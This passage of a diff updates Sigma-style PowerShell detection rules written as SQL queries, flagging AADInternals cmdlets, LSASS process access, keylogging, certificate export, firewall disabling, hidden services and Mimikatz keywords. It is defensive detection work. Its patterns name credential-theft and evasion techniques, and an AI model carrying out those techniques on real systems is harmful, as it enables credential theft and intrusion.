Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "status": "test", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ], + "falsepositives": [ + "Legitimate user creation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + ], + "filename": "posh_ps_create_local_user.yml" + }, + { + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP 
'(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": 
"posh_ps_enable_psremoting.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_audio_exfiltration.yml" 
}, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "status": "test", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1546.013" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Powershell 
Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "author": "frack113", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1565" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "PowerShell 
Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "author": "frack113", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", "status": "test", - "description": "Powershell use PassThru option to start 
in background", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "status": "experimental", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of 
those commands, will be embedded within the protocol traffic between the client and server.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "status": "experimental", - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText 
LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Enable Windows Remote 
Management", + "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "status": "test", - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "author": "frack113", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Unknown" + "Legitimate certificate exports invoked by administrators or users (depends 
on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "title": "Powershell MsXml COM Object", + "id": "78aa1347-1517-4454-9982-b338d6df8343", "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113, MatilJ", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_msxml_com.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "App-V clients" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", 
